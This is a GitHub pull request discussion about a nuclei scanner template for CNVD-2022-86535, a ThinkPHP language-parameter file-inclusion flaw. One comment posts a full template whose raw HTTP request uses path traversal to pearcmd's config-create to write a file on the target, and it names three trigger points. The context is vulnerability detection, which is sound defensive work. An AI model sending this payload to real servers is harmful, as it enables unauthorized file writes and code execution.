Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

CNVD-2022-86535 #6405

Merged
merged 4 commits into from
Jul 5, 2023
Merged

CNVD-2022-86535 #6405

merged 4 commits into from
Jul 5, 2023

Conversation

Armandhe-China
Copy link
Contributor

@Armandhe-China Armandhe-China commented Dec 21, 2022
edited
Loading

Template / PR Information

Template Validation

I've validated this template locally?

  • YES
  • NO

Additional Details (leave it blank if not applicable)

Additional References:

@ritikchaddha ritikchaddha self-assigned this Dec 31, 2022
@ViCrack
Copy link
Contributor

ViCrack commented Apr 3, 2023

https://github.com/projectdiscovery/nuclei-templates/blob/main/cves/2022/CVE-2022-47945.yaml

@ViCrack
Copy link
Contributor

ViCrack commented Jun 19, 2023

应该是跟CVE-2022-47945重复了

两个模板不如整合成CVE-2022-47945

https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2022/CVE-2022-47945.yaml

@ritikchaddha
Copy link
Contributor

Hello there, @ViCrack, We are adding templates for all possible CVE and CNVD datasets, though I checked both templates, and the POC/exploit for both templates are slightly different. I also tried the CVE-2022-47945 template/POC on the CNVD-2022-86535 vulnerable docker instance, but it did not work.

@ViCrack
Copy link
Contributor

ViCrack commented Jun 19, 2023

@ritikchaddha

My English is not good

CVE-2022-47945 CNVD-2022-86535
Actually, it's the same vulnerability that has already been duplicated. Just delete one of them
This is an article written by the first original author to discover this vulnerability , https://tttang.com/archive/1865/

图片

CVE-2022-47945 is written inaccurately because it does not reflect the key point: /usr/local/php.pearcmd

There are at least three trigger points for vulnerabilities :

  1. ?lang=xxxxx
  2. think-lang: xxxx
  3. cookie: think_lang=xxxx

Among them, ?lang=xxxxx should be the most compatible and sufficient, as other triggering methods may not be effective in higher versions

For CNVD-2022-86535, of course, these three can also be merged into one to reduce HTTP requests, while removing unused safedog(), and it is best not to use {{rand_base(10)}}.log for writing files, but to use /tmp/{{rand_base(10)}}.log. instead, as the webroot directory may not have writable permissions

图片

This may be a bug in Nuclei, and the location of the URL get parameter has changed. Otherwise, the third data packet would have been successful

图片
图片

If the problem of parameter displacement in nuclei can be fixed, then the following template should be feasible

id: CNVD-2022-86535

info:
  name: Thinkphp Multi Languag- File Inc And RCE
  author: arliya,ritikchaddha
  severity: high
  description: |
    ThinkPHP has a command execution vulnerability because the multi-language function is enabled and the parameter passing of parameter lang is not strictly filtered. Attackers can use this vulnerability to execute commands.
  reference:
    - https://cn-sec.com/archives/1465289.html
    - https://blog.csdn.net/qq_60614981/article/details/128724640
    - https://www.cnvd.org.cn/flaw/show/CNVD-2022-86535
  metadata:
    verified: true
  tags: cnvd,cnvd2022,thinkphp,rce

variables:
  content: "{{rand_base(5)}}"
  filename: "{{rand_base(10)}}"

http:
  - raw:
      - |
        GET /?lang=../../../../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/{{content}}+/tmp/{{filename}}.log HTTP/1.1
        Host: {{Hostname}}
        think-lang: ../../../../../../../../../../../usr/local/php/pearcmd
        Cookie: think_lang=../../../../../../../../../../../usr/local/lib/php/pearcmd

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "CONFIGURATION"
          - "Successfully created"
          - "PEAR.PHP.NET"
          - "/tmp/{{filename}}"
        condition: and

图片

CVE-2022-47945和CNVD-2022-86535其实是同一个漏洞,重复了,删掉其中一个即可

这是第一个发现这个漏洞的原作者写的文章 https://tttang.com/archive/1865/

图片

CVE-2022-47945 写的不准确,因为没有体现到关键点:/usr/local/php/pearcmd

漏洞触发点至少有三处:

  1. ?lang=xxxxx
  2. think-lang: xxxx
  3. cookie: think_lang=xxxx

其中?lang=xxxxx应该是兼容性最好的,也足够了,其他的触发方法可能在高版本情况下无效

对于CNVD-2022-86535来说,当然也可以将这三个合并成一个,减少发包量,同时去掉没用的safedog(),并且写文件最好不要用{{rand_base(10)}}.log,而是用/tmp/xxxx,因为可能webroot目录没有可写权限
图片

这块可能是nuclei的bug,url get参数的位置发生了改变,不然第三个数据包其实是能成功的
图片
图片

@ritikchaddha
Copy link
Contributor

@ViCrack I agree that the CVE-2022-47945 template appears to be inaccurate and should be changed. In addition, as previously stated, we are adding/accepting templates for all possible CVE and CNVD datasets.

However, we are aware of the issue of shuffling the parameters when running the nuclei, which disrupts the payload execution.

@ritikchaddha ritikchaddha added the Done Ready to merge label Jul 4, 2023
@DhiyaneshGeek
Copy link
Member

Hi @Armandhe-China Thank you so much for sharing this template with the community 🔥

You can join our discord server. It's a great place to connect with fellow contributors and stay updated with the latest developments.

@DhiyaneshGeek DhiyaneshGeek merged commit e4a1155 into projectdiscovery:main Jul 5, 2023
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers

@DhiyaneshGeek DhiyaneshGeek DhiyaneshGeek approved these changes

Assignees

@ritikchaddha ritikchaddha

Labels
Done Ready to merge
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.
4 participants
@Armandhe-China @ViCrack @ritikchaddha @DhiyaneshGeek